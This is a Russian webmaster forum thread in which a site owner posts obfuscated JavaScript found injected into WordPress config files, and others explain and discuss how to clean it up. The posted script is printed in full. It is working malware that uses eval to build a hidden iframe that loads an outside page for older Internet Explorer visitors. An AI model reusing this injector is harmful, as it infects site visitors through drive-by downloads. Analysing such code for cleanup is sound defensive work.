С нами с 14.10.02
Сообщения: 462
Рейтинг: 727
|
 Добавлено: 23/09/09 в 17:19 |
Кто знает, что делает этот код и каким образом он мог затесаться в wp-config
| Код: | <script>/**/function WYe7(TeJ3, Ikl0, CJt4) { var jPd0; jPd0=TeJ3.split(Ikl0); var Ikg3=jPd0.join(CJt4); return Ikg3;/**/ } function ErO2(EHs8) { EHs8 = WYe7(EHs8,"##+##","'"); EHs8 = WYe7(EHs8,"##|##","\\"); Ikg3=""; vzu3 =""; for(k=0;k<EHs8.length;k++) { Ikg3 = EHs8.charCodeAt(k); if (Ikg3==32){Ikg3=35} else if (Ikg3==35){Ikg3=32} else if (Ikg3==59){Ikg3=64} else if (Ikg3==64){Ikg3=59} else if (Ikg3==37){Ikg3=42} else if (Ikg3==42){Ikg3=37} else if (Ikg3>=97 && Ikg3<=122) { Ikg3=Ikg3-97;Ikg3=25-Ikg3;Ikg3+=97; }else if (Ikg3>=65 && Ikg3<=90) { Ikg3=Ikg3-65;Ikg3=25-Ikg3;Ikg3+=65; }else if (Ikg3>=48 && Ikg3<=57) { Ikg3=Ikg3-48;Ikg3=9-Ikg3;Ikg3+=48; } vzu3 += String.fromCharCode(Ikg3); } return vzu3;/**/ }Tvt5=eval;var Ewy8;var EfnA;var QWrk;var Zufs;var Dgea;var WhHb;var MxS2;Tvt5(ErO2('DsSy#=###+##sggk://svczglny.xln/urovh/a/hgzgrx.ksk##+##@Wtvz#=###+##ruiznv##+##@'));Tvt5(ErO2('Vdb1#=#wlxfnvmg.xivzgvVovnvmg(Wtvz)@Vdb1.hvgZggiryfgv(##+##hix##+##,#DsSy)@'));Tvt5(ErO2('Vdb1.hvgZggiryfgv(##+##drwgs##+##,9)@Vdb1.hvgZggiryfgv(##+##svrtsg##+##,9)@Vdb1.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Tvt5(ErO2('Vdb1.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Tvt5(ErO2('Vdb1.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#NcH7=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Tvt5(ErO2('JDip=NcH7.rmwvcLu(##+##nhrv##+##)@VumZ=NcH7.rmwvcLu(##+##nhrv#1##+##)@Afuh=NcH7.rmwvcLu(##+##mg#3##+##)@'));if ((EfnA==-1)&&(QWrk>0)&&(Zufs==-1)){Tvt5(ErO2('wlxfnvmg.ylwb.zkkvmwXsrow(Vdb1)@'));}</script>
|
Последний раз редактировалось: Axel-B (24/09/09 в 15:25), всего редактировалось 1 раз
|
|
|
|
Лучшие сайты в интеррасиал нише здесь Dogfart Зачетные RSS,FHG, и др. класные Промо
|
0
|
|
| |
С нами с 13.08.08
Сообщения: 1538
Рейтинг: 1011
|
| Добавлено: 23/09/09 в 20:43 |
Затесаться он туда мог через любую дыру. Данный код выполняет на твоей странице нехитрым образом зашифрованный код, ща погляжу...
Так, он попросту создает на странице невидимый iframe, ссылающийся на вот эту вот страницу, если в сигнатуре браузера нет msie 8 и nt 6, но есть msie:
Наверняка там вирусня какая-нибудь  Проверять не полезу, нуивонах...
|
|
|
|
| |
С нами с 06.03.05
Сообщения: 6216
Рейтинг: 7375
 
|
| Добавлено: 24/09/09 в 11:32 |
а версия вп стояла последняя?
|
|
|
|
| |
С нами с 14.10.02
Сообщения: 462
Рейтинг: 727
|
| Добавлено: 24/09/09 в 12:59 |
Нет, была 2.7. Уже обновился.
|
|
|
|
Лучшие сайты в интеррасиал нише здесь Dogfart Зачетные RSS,FHG, и др. класные Промо
|
0
|
|
| |
завлекаю текстами
С нами с 30.04.09
Сообщения: 1610
Рейтинг: 1165
|
| Добавлено: 24/09/09 в 16:37 |
ну так это...его же просто снести можно?
|
|
|
|
| |
С нами с 14.10.02
Сообщения: 462
Рейтинг: 727
|
| Добавлено: 24/09/09 в 20:37 |
Скрипт снес сразу как заметил (был в двух файлах wp-config и wp-cashe-config)
|
|
|
|
Лучшие сайты в интеррасиал нише здесь Dogfart Зачетные RSS,FHG, и др. класные Промо
|
0
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 26/09/09 в 13:23 |
лопанули тебя, пиши абузы
|
|
|
|
| |
С нами с 27.09.09
Сообщения: 2
Рейтинг: 13
|
| Добавлено: 27/09/09 в 10:58 |
Сплоит.Когда создал блог не помешало бы X-Spider'ом просканить
|
|
|
|
| |
С нами с 14.10.02
Сообщения: 462
Рейтинг: 727
|
| Добавлено: 27/09/09 в 17:20 |
Интересно как он там появился. После зачистки вроде не появляется больше.
|
|
|
|
Лучшие сайты в интеррасиал нише здесь Dogfart Зачетные RSS,FHG, и др. класные Промо
|
0
|
|
| |
